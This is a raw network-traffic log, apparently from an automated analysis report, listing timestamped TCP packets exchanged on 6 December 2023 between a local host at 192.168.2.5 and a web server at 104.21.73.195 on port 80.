                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.623650074 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.623671055 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.624460936 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.624479055 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.624509096 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.624533892 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.624552011 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.624577999 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.624583960 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.624603033 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.624629974 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.624635935 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.624680996 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.625423908 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.625695944 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.625740051 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.625744104 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.625758886 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.625777006 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.625801086 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.625811100 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.625828981 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.625845909 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.625849962 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.625883102 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.626386881 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.626429081 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.626447916 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.626466990 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.626477003 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.626485109 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.626502037 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.626502037 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.626521111 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.626543999 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.627321959 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.627362967 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.627368927 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.627381086 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.627398968 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.627417088 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.627429008 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.627456903 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.627473116 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.627490997 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.627532959 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.628268003 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.628287077 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.628326893 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.628329992 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.628345013 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.628362894 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.628380060 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.628391981 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.628405094 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.628432035 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.629174948 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.629193068 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.629223108 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.629224062 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.629261017 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.629267931 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.629280090 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.629297972 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.629314899 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.629327059 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.629359007 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.630105019 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.630121946 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.630139112 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.630165100 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.630197048 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.630213976 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.630240917 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.630247116 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.630280972 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.630292892 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631048918 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631064892 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631088972 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631103039 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631113052 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631129980 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631134987 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631148100 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631165028 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631170988 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631210089 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631978035 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.631994963 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632010937 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632035971 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632066011 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632082939 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632101059 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632105112 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632145882 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632147074 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632882118 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632899046 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632929087 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632930040 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632949114 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632970095 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.632973909 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.633008003 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.633024931 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.633028030 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.633065939 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.633826017 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.633843899 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.633861065 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.633878946 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.633888006 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.633917093 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.633950949 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.633985996 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.634016991 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.634031057 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.634758949 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.634809971 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.634882927 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.634901047 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.634948969 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.634953976 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.634973049 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.634990931 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.635016918 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.635024071 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.635056973 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.635068893 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.635839939 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.635855913 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.635874033 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.635915041 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.635915041 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.635929108 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.635947943 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636003017 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636017084 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636019945 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636065960 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636770010 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636786938 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636801958 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636818886 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636830091 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636837959 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636853933 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636868954 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636902094 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.636905909 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.637691021 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.637708902 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.637725115 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.637744904 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.637749910 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.637767076 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.637769938 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.637814045 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.637830973 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.637842894 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.637871027 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.638595104 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.638634920 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.638652086 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.638660908 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.638676882 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.638693094 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.638696909 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.638715029 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.638716936 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.638739109 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.639527082 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.639544964 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.639580965 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.639595032 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.639612913 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.639631033 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.639637947 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.639648914 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.639666080 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.639673948 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.639727116 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.665765047 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.665783882 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.665802956 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.665880919 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.669486046 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.669506073 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.669523954 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.669543982 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.669575930 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.670773029 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.670792103 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.670876026 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.670892000 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.670912027 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.670938015 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.670953989 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.670955896 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.670970917 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671000004 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671080112 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671097040 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671129942 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671782017 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671799898 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671817064 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671844006 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671865940 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671875000 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671906948 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671952963 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671974897 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.671992064 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.672032118 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.672682047 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.672700882 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.672725916 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.672766924 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.672770977 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.672791958 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.672825098 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.672828913 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.672843933 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.672863960 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.673599005 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.673616886 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.673649073 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.673842907 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.673861027 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.673890114 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.673906088 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.673938990 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.673957109 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.673962116 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.673989058 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674005032 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674036026 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674082041 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674740076 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674757957 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674776077 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674806118 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674813032 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674844980 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674863100 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674858093 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674895048 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.674901962 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.675673008 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.675719023 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.675736904 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.675736904 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.675760984 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.675784111 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.675803900 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.675844908 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.675864935 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.675894976 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.675941944 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.676597118 CET8049706104.21.73.195192.168.2.5
